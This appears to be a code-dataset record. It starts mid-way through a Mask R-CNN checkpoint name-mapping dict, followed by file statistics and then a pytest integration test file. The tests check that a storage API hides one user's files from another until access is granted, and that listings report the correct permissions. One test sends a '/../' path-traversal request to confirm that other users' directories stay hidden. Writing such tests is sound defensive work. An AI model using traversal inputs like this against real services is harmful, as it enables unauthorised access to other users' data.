'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_32/batch_normalization_35/beta': 'resnet50/btlnck_block_2_3/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_32/batch_normalization_35/gamma': 'resnet50/btlnck_block_2_3/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_32/batch_normalization_35/moving_mean': 'resnet50/btlnck_block_2_3/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_32/batch_normalization_35/moving_variance': 'resnet50/btlnck_block_2_3/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_32/conv2d_35/kernel': 'resnet50/btlnck_block_2_3/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_33/batch_normalization_36/beta': 'resnet50/btlnck_block_2_3/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_33/batch_normalization_36/gamma': 'resnet50/btlnck_block_2_3/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_33/batch_normalization_36/moving_mean': 'resnet50/btlnck_block_2_3/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_33/batch_normalization_36/moving_variance': 'resnet50/btlnck_block_2_3/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_33/conv2d_36/kernel': 'resnet50/btlnck_block_2_3/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_34/batch_normalization_37/beta': 'resnet50/btlnck_block_2_4/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_34/batch_normalization_37/gamma': 'resnet50/btlnck_block_2_4/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_34/batch_normalization_37/moving_mean': 'resnet50/btlnck_block_2_4/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_34/batch_normalization_37/moving_variance': 'resnet50/btlnck_block_2_4/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_34/conv2d_37/kernel': 'resnet50/btlnck_block_2_4/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_35/batch_normalization_38/beta': 'resnet50/btlnck_block_2_4/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_35/batch_normalization_38/gamma': 'resnet50/btlnck_block_2_4/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_35/batch_normalization_38/moving_mean': 'resnet50/btlnck_block_2_4/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_35/batch_normalization_38/moving_variance': 'resnet50/btlnck_block_2_4/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_35/conv2d_38/kernel': 'resnet50/btlnck_block_2_4/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_36/batch_normalization_39/beta': 'resnet50/btlnck_block_2_4/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_36/batch_normalization_39/gamma': 'resnet50/btlnck_block_2_4/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_36/batch_normalization_39/moving_mean': 'resnet50/btlnck_block_2_4/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_36/batch_normalization_39/moving_variance': 'resnet50/btlnck_block_2_4/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_11/conv2d_block_36/conv2d_39/kernel': 'resnet50/btlnck_block_2_4/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_37/batch_normalization_40/beta': 'resnet50/btlnck_block_2_5/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_37/batch_normalization_40/gamma': 'resnet50/btlnck_block_2_5/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_37/batch_normalization_40/moving_mean': 'resnet50/btlnck_block_2_5/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_37/batch_normalization_40/moving_variance': 'resnet50/btlnck_block_2_5/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_37/conv2d_40/kernel': 'resnet50/btlnck_block_2_5/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_38/batch_normalization_41/beta': 'resnet50/btlnck_block_2_5/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_38/batch_normalization_41/gamma': 'resnet50/btlnck_block_2_5/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_38/batch_normalization_41/moving_mean': 'resnet50/btlnck_block_2_5/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_38/batch_normalization_41/moving_variance': 'resnet50/btlnck_block_2_5/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_38/conv2d_41/kernel': 'resnet50/btlnck_block_2_5/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_39/batch_normalization_42/beta': 'resnet50/btlnck_block_2_5/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_39/batch_normalization_42/gamma': 'resnet50/btlnck_block_2_5/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_39/batch_normalization_42/moving_mean': 'resnet50/btlnck_block_2_5/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_39/batch_normalization_42/moving_variance': 'resnet50/btlnck_block_2_5/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_12/conv2d_block_39/conv2d_42/kernel': 'resnet50/btlnck_block_2_5/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_40/batch_normalization_44/beta': 'resnet50/btlnck_block_3_0/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_40/batch_normalization_44/gamma': 'resnet50/btlnck_block_3_0/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_40/batch_normalization_44/moving_mean': 'resnet50/btlnck_block_3_0/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_40/batch_normalization_44/moving_variance': 'resnet50/btlnck_block_3_0/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_40/conv2d_44/kernel': 'resnet50/btlnck_block_3_0/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_41/batch_normalization_45/beta': 'resnet50/btlnck_block_3_0/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_41/batch_normalization_45/gamma': 'resnet50/btlnck_block_3_0/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_41/batch_normalization_45/moving_mean': 'resnet50/btlnck_block_3_0/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_41/batch_normalization_45/moving_variance': 'resnet50/btlnck_block_3_0/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_41/conv2d_45/kernel': 'resnet50/btlnck_block_3_0/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_42/batch_normalization_46/beta': 'resnet50/btlnck_block_3_0/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_42/batch_normalization_46/gamma': 'resnet50/btlnck_block_3_0/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_42/batch_normalization_46/moving_mean': 'resnet50/btlnck_block_3_0/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_42/batch_normalization_46/moving_variance': 'resnet50/btlnck_block_3_0/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/conv2d_block_42/conv2d_46/kernel': 'resnet50/btlnck_block_3_0/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/shortcut/batch_normalization_43/beta': 'resnet50/btlnck_block_3_0/shortcut/conv2d/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/shortcut/batch_normalization_43/gamma': 'resnet50/btlnck_block_3_0/shortcut/conv2d/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/shortcut/batch_normalization_43/moving_mean': 'resnet50/btlnck_block_3_0/shortcut/conv2d/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/shortcut/batch_normalization_43/moving_variance': 'resnet50/btlnck_block_3_0/shortcut/conv2d/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_13/shortcut/conv2d_43/kernel': 'resnet50/btlnck_block_3_0/shortcut/conv2d/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_43/batch_normalization_47/beta': 'resnet50/btlnck_block_3_1/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_43/batch_normalization_47/gamma': 'resnet50/btlnck_block_3_1/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_43/batch_normalization_47/moving_mean': 'resnet50/btlnck_block_3_1/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_43/batch_normalization_47/moving_variance': 'resnet50/btlnck_block_3_1/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_43/conv2d_47/kernel': 'resnet50/btlnck_block_3_1/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_44/batch_normalization_48/beta': 'resnet50/btlnck_block_3_1/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_44/batch_normalization_48/gamma': 'resnet50/btlnck_block_3_1/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_44/batch_normalization_48/moving_mean': 'resnet50/btlnck_block_3_1/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_44/batch_normalization_48/moving_variance': 'resnet50/btlnck_block_3_1/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_44/conv2d_48/kernel': 'resnet50/btlnck_block_3_1/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_45/batch_normalization_49/beta': 'resnet50/btlnck_block_3_1/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_45/batch_normalization_49/gamma': 'resnet50/btlnck_block_3_1/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_45/batch_normalization_49/moving_mean': 'resnet50/btlnck_block_3_1/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_45/batch_normalization_49/moving_variance': 'resnet50/btlnck_block_3_1/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_14/conv2d_block_45/conv2d_49/kernel': 'resnet50/btlnck_block_3_1/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_46/batch_normalization_50/beta': 'resnet50/btlnck_block_3_2/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_46/batch_normalization_50/gamma': 'resnet50/btlnck_block_3_2/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_46/batch_normalization_50/moving_mean': 'resnet50/btlnck_block_3_2/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_46/batch_normalization_50/moving_variance': 'resnet50/btlnck_block_3_2/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_46/conv2d_50/kernel': 'resnet50/btlnck_block_3_2/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_47/batch_normalization_51/beta': 'resnet50/btlnck_block_3_2/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_47/batch_normalization_51/gamma': 'resnet50/btlnck_block_3_2/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_47/batch_normalization_51/moving_mean': 'resnet50/btlnck_block_3_2/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_47/batch_normalization_51/moving_variance': 'resnet50/btlnck_block_3_2/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_47/conv2d_51/kernel': 'resnet50/btlnck_block_3_2/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_48/batch_normalization_52/beta': 'resnet50/btlnck_block_3_2/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_48/batch_normalization_52/gamma': 'resnet50/btlnck_block_3_2/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_48/batch_normalization_52/moving_mean': 'resnet50/btlnck_block_3_2/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_48/batch_normalization_52/moving_variance': 'resnet50/btlnck_block_3_2/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_3/bottleneck_block_15/conv2d_block_48/conv2d_52/kernel': 'resnet50/btlnck_block_3_2/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/conv2d_block/batch_normalization/beta': 'resnet50/conv2d/BatchNorm/beta',
'mrcnn/resnet50/conv2d_block/batch_normalization/gamma': 'resnet50/conv2d/BatchNorm/gamma',
'mrcnn/resnet50/conv2d_block/batch_normalization/moving_mean': 'resnet50/conv2d/BatchNorm/moving_mean',
'mrcnn/resnet50/conv2d_block/batch_normalization/moving_variance': 'resnet50/conv2d/BatchNorm/moving_variance',
'mrcnn/resnet50/conv2d_block/conv2d/kernel': 'resnet50/conv2d/conv2d/kernel',
}
| 161.051661 | 183 | 0.865414 | 6,365 | 43,645 | 5.437706 | 0.013669 | 0.099535 | 0.172777 | 0.210338 | 0.982058 | 0.980931 | 0.97521 | 0.918725 | 0.84164 | 0.770506 | 0 | 0.086958 | 0.036957 | 43,645 | 270 | 184 | 161.648148 | 0.736486 | 0.002749 | 0 | 0 | 0 | 0 | 0.926352 | 0.926352 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
9e3f549696b97ad5418eb0bb33fa8e5100aa7fb1 | 16,197 | py | Python | tests/integration/test_api_sharing_resources.py | neuro-inc/platform-storage-api | 7564d6f353f7839962cc5dc2793ba44359eaf390 | [
"Apache-2.0"
] | null | null | null | tests/integration/test_api_sharing_resources.py | neuro-inc/platform-storage-api | 7564d6f353f7839962cc5dc2793ba44359eaf390 | [
"Apache-2.0"
] | 2 | 2021-12-29T21:43:29.000Z | 2022-01-27T10:45:49.000Z | tests/integration/test_api_sharing_resources.py | neuro-inc/platform-storage-api | 7564d6f353f7839962cc5dc2793ba44359eaf390 | [
"Apache-2.0"
] | null | null | null | import asyncio
from collections.abc import Awaitable, Callable
from io import BytesIO
from time import time as current_time
from typing import Any
from unittest import mock
import aiohttp
import yarl
from platform_storage_api.fs.local import FileStatusType
from .auth import _User, _UserFactory
from tests.integration.conftest import ApiConfig, status_iter_response_to_list
class TestStorageListAndResourceSharing:
    """Integration tests for directory listing (``LISTSTATUS``) combined with
    resource sharing: one user's storage entries must only become visible to
    another user after an explicit grant, and listings must report the
    permission each grant confers on every visible entry.
    """

    def file_status_sort(self, file_status: dict[str, Any]) -> Any:
        # Stable sort key for listing responses: order entries by "path".
        return file_status["path"]

    async def test_ls_other_user_data_no_permission(
        self,
        server_url: str,
        api: ApiConfig,
        client: aiohttp.ClientSession,
        regular_user_factory: _UserFactory,
    ) -> None:
        """Listing another user's directory without any grant fails.

        NOTE(review): the expected status is 404 rather than 403 —
        presumably so the path's existence is not leaked; confirm against
        the handler.
        """
        user1 = await regular_user_factory()
        headers = {"Authorization": "Bearer " + user1.token}
        dir_url = f"{server_url}/{user1.name}/path/to"
        url = dir_url + "/file"
        payload = b"test"
        async with client.put(url, headers=headers, data=BytesIO(payload)) as response:
            assert response.status == 201
        user2 = await regular_user_factory()
        headers = {
            "Authorization": "Bearer " + user2.token,
            "Accept": "application/x-ndjson",
        }
        params = {"op": "LISTSTATUS"}
        async with client.get(dir_url, headers=headers, params=params) as response:
            assert response.status == 404

    async def test_ls_other_user_data_no_permission_issue(
        self,
        server_url: str,
        api: ApiConfig,
        client: aiohttp.ClientSession,
        regular_user_factory: _UserFactory,
    ) -> None:
        """Listing the storage root via ``<own name>/../`` shows only the
        requesting user's own entry, not other users'."""
        # user1 uploads a file
        user1 = await regular_user_factory()
        headers = {"Authorization": "Bearer " + user1.token}
        dir_url = f"{server_url}/{user1.name}/path/to"
        url = dir_url + "/file"
        payload = b"test"
        async with client.put(url, headers=headers, data=BytesIO(payload)) as response:
            assert response.status == 201
        # user2 uploads a file
        user2 = await regular_user_factory()
        headers = {"Authorization": "Bearer " + user2.token}
        dir_url = f"{server_url}/{user2.name}/path/to"
        url = dir_url + "/file"
        payload = b"test"
        async with client.put(url, headers=headers, data=BytesIO(payload)) as response:
            assert response.status == 201
        # user2 lists users
        headers = {
            "Authorization": "Bearer " + user2.token,
            "Accept": "application/x-ndjson",
        }
        dir_url = f"{server_url}/{user2.name}/../"
        params = {"op": "LISTSTATUS"}
        # encoded=True keeps the literal "/../" in the request path so the
        # server (not yarl's client-side normalization) resolves it.
        async with client.get(
            yarl.URL(dir_url, encoded=True), headers=headers, params=params
        ) as response:
            assert response.status == 200
            assert response.headers["Content-Type"] == "application/x-ndjson"
            resp_text = await response.text()
            assert user1.name not in resp_text
            assert user2.name in resp_text

    async def test_ls_other_user_data_shared_with_files(
        self,
        server_url: str,
        api: ApiConfig,
        client: aiohttp.ClientSession,
        regular_user_factory: _UserFactory,
        granter: Callable[[str, Any, _User], Awaitable[None]],
        cluster_name: str,
    ) -> None:
        """After a "read" grant on a parent path, all of the directory's
        entries (file and subdirectory) become listable with "read"."""
        user1 = await regular_user_factory()
        headers1 = {"Authorization": "Bearer " + user1.token}
        user2 = await regular_user_factory()
        headers2 = {
            "Authorization": "Bearer " + user2.token,
            "Accept": "application/x-ndjson",
        }
        # create file /path/to/file by user1
        dir_url = f"{server_url}/{user1.name}/path/to"
        url = dir_url + "/file"
        payload = b"test"
        min_mtime_first = int(current_time())
        async with client.put(url, headers=headers1, data=BytesIO(payload)) as response:
            assert response.status == 201
        params = {"op": "MKDIRS"}
        async with client.put(
            dir_url + "/second", headers=headers1, params=params
        ) as response:
            assert response.status == 201
        # list by user2
        params = {"op": "LISTSTATUS"}
        # Before the grant the directory must be reported as missing.
        async with client.get(dir_url, headers=headers2, params=params) as response:
            assert response.status == 404
        await granter(
            user2.name,
            [{"uri": f"storage://{cluster_name}/{user1.name}/path/", "action": "read"}],
            user1,
        )
        async with client.get(dir_url, headers=headers2, params=params) as response:
            assert response.status == 200
            assert response.headers["Content-Type"] == "application/x-ndjson"
            statuses = await status_iter_response_to_list(response.content)
            statuses = sorted(statuses, key=self.file_status_sort)
            assert statuses == [
                {
                    "path": "file",
                    "length": len(payload),
                    "type": str(FileStatusType.FILE),
                    "modificationTime": mock.ANY,
                    "permission": "read",
                },
                {
                    "path": "second",
                    "length": 0,
                    "type": str(FileStatusType.DIRECTORY),
                    "modificationTime": mock.ANY,
                    "permission": "read",
                },
            ]
            # Both entries were created after min_mtime_first was sampled.
            for status in statuses:
                assert status["modificationTime"] >= min_mtime_first

    async def test_ls_other_user_data_exclude_files(
        self,
        server_url: str,
        api: ApiConfig,
        client: aiohttp.ClientSession,
        regular_user_factory: _UserFactory,
        granter: Callable[[str, Any, _User], Awaitable[None]],
        cluster_name: str,
    ) -> None:
        """A grant on a single subdirectory exposes only that entry in the
        parent's listing; the unshared sibling file stays hidden."""
        user1 = await regular_user_factory()
        headers1 = {"Authorization": "Bearer " + user1.token}
        user2 = await regular_user_factory()
        headers2 = {
            "Authorization": "Bearer " + user2.token,
            "Accept": "application/x-ndjson",
        }
        # create file /path/to/file by user1
        dir_url = f"{server_url}/{user1.name}/path/to/"
        url = dir_url + "/file"
        payload = b"test"
        min_mtime_first = int(current_time())
        async with client.put(url, headers=headers1, data=BytesIO(payload)) as response:
            assert response.status == 201
        params = {"op": "MKDIRS"}
        async with client.put(
            dir_url + "/first/second", headers=headers1, params=params
        ) as response:
            assert response.status == 201
        # list by user2
        params = {"op": "LISTSTATUS"}
        async with client.get(dir_url, headers=headers2, params=params) as response:
            assert response.status == 404
        root_uri = f"storage://{cluster_name}/{user1.name}"
        # Share only /path/to/first — not /path/to itself.
        await granter(
            user2.name, [{"uri": root_uri + "/path/to/first", "action": "read"}], user1
        )
        async with client.get(dir_url, headers=headers2, params=params) as response:
            assert response.status == 200
            assert response.headers["Content-Type"] == "application/x-ndjson"
            statuses = await status_iter_response_to_list(response.content)
            statuses = sorted(statuses, key=self.file_status_sort)
            # Only the granted "first" directory appears; "file" is excluded.
            assert statuses == [
                {
                    "path": "first",
                    "length": 0,
                    "type": str(FileStatusType.DIRECTORY),
                    "modificationTime": mock.ANY,
                    "permission": "read",
                }
            ]
            for status in statuses:
                assert status["modificationTime"] >= min_mtime_first

    async def test_liststatus_other_user_data_two_subdirs(
        self,
        server_url: str,
        api: ApiConfig,
        client: aiohttp.ClientSession,
        regular_user_factory: _UserFactory,
        granter: Callable[[str, Any, _User], Awaitable[None]],
        cluster_name: str,
    ) -> None:
        """Two sibling grants expose exactly those two subdirectories; the
        ungranted sibling ("fourth") is filtered out of the listing."""
        user1 = await regular_user_factory()
        headers1 = {"Authorization": "Bearer " + user1.token}
        user2 = await regular_user_factory()
        headers2 = {
            "Authorization": "Bearer " + user2.token,
            "Accept": "application/x-ndjson",
        }
        # create file /path/to/file by user1
        dir_url = f"{server_url}/{user1.name}/path/to"
        url = dir_url + "/file"
        payload = b"test"
        async with client.put(url, headers=headers1, data=BytesIO(payload)) as response:
            assert response.status == 201
        params = {"op": "MKDIRS"}
        min_mtime_second = int(current_time())
        async with client.put(
            dir_url + "/first/second", headers=headers1, params=params
        ) as response:
            assert response.status == 201
        min_mtime_third = int(current_time())
        async with client.put(
            dir_url + "/first/third", headers=headers1, params=params
        ) as response:
            assert response.status == 201
        async with client.put(
            dir_url + "/first/fourth", headers=headers1, params=params
        ) as response:
            assert response.status == 201
        # list by user2
        params = {"op": "LISTSTATUS"}
        async with client.get(dir_url, headers=headers2, params=params) as response:
            assert response.status == 404
        root_uri = f"storage://{cluster_name}/{user1.name}"
        await granter(
            user2.name,
            [{"uri": root_uri + "/path/to/first/second", "action": "read"}],
            user1,
        )
        await granter(
            user2.name,
            [{"uri": root_uri + "/path/to/first/third", "action": "read"}],
            user1,
        )
        async with client.get(
            dir_url + "/first", headers=headers2, params=params
        ) as response:
            assert response.status == 200
            assert response.headers["Content-Type"] == "application/x-ndjson"
            statuses = await status_iter_response_to_list(response.content)
            statuses = sorted(statuses, key=self.file_status_sort)
            assert statuses == [
                {
                    "path": "second",
                    "length": 0,
                    "type": str(FileStatusType.DIRECTORY),
                    "modificationTime": mock.ANY,
                    "permission": "read",
                },
                {
                    "path": "third",
                    "length": 0,
                    "type": str(FileStatusType.DIRECTORY),
                    "modificationTime": mock.ANY,
                    "permission": "read",
                },
            ]
            assert statuses[0]["modificationTime"] >= min_mtime_second
            assert statuses[1]["modificationTime"] >= min_mtime_third

    async def test_liststatus_permissions(
        self,
        server_url: str,
        api: ApiConfig,
        client: aiohttp.ClientSession,
        regular_user_factory: _UserFactory,
        granter: Callable[[str, Any, _User], Awaitable[None]],
        cluster_name: str,
    ) -> None:
        """Listings report per-entry permissions derived from grants,
        including entries whose visibility comes only from grants on paths
        nested below them ("read" on an ancestor of a granted child)."""
        user1 = await regular_user_factory()
        headers1 = {"Authorization": "Bearer " + user1.token}
        user2 = await regular_user_factory()
        headers2 = {
            "Authorization": "Bearer " + user2.token,
            "Accept": "application/x-ndjson",
        }
        # create file /path/to/file by user1
        dir_url = f"{server_url}/{user1.name}/path/to"
        url = dir_url + "/file"
        payload = b"test"
        async with client.put(url, headers=headers1, data=BytesIO(payload)) as response:
            assert response.status == 201
        params = {"op": "MKDIRS"}
        # The 1s sleeps separate consecutive operations so the whole-second
        # min_mtime_* markers below unambiguously bracket each mkdir.
        await asyncio.sleep(1)
        min_mtime_third = int(current_time())
        await asyncio.sleep(1)
        async with client.put(
            dir_url + "/first/second/third", headers=headers1, params=params
        ) as response:
            assert response.status == 201
        await asyncio.sleep(1)
        min_mtime_fourth = int(current_time())
        await asyncio.sleep(1)
        async with client.put(
            dir_url + "/first/second/fourth", headers=headers1, params=params
        ) as response:
            assert response.status == 201
        await asyncio.sleep(1)
        async with client.put(
            dir_url + "/first/fifth", headers=headers1, params=params
        ) as response:
            assert response.status == 201
        # list by user2
        params = {"op": "LISTSTATUS"}
        async with client.get(dir_url, headers=headers2, params=params) as response:
            assert response.status == 404
        root_uri = f"storage://{cluster_name}/{user1.name}"
        # Three grants at different depths and with different actions.
        await granter(
            user2.name, [{"uri": root_uri + "/path/to/file", "action": "read"}], user1
        )
        await granter(
            user2.name,
            [{"uri": root_uri + "/path/to/first/second", "action": "write"}],
            user1,
        )
        await granter(
            user2.name,
            [{"uri": root_uri + "/path/to/first/second/third", "action": "manage"}],
            user1,
        )
        async with client.get(dir_url, headers=headers2, params=params) as response:
            assert response.status == 200
            assert response.headers["Content-Type"] == "application/x-ndjson"
            statuses = await status_iter_response_to_list(response.content)
            statuses = sorted(statuses, key=self.file_status_sort)
            # "first" is listable (with "read") only because of the grants on
            # its descendants; "fifth" has no grant and must not leak here.
            assert statuses == [
                {
                    "path": "file",
                    "length": 4,
                    "type": "FILE",
                    "modificationTime": mock.ANY,
                    "permission": "read",
                },
                {
                    "path": "first",
                    "length": 0,
                    "type": "DIRECTORY",
                    "modificationTime": mock.ANY,
                    "permission": "read",
                },
            ]
            # "file" predates the first marker; "first"'s mtime was bumped by
            # the later mkdirs inside it.
            assert statuses[0]["modificationTime"] <= min_mtime_third
            assert statuses[1]["modificationTime"] >= min_mtime_fourth
        async with client.get(
            dir_url + "/first", headers=headers2, params=params
        ) as response:
            assert response.status == 200
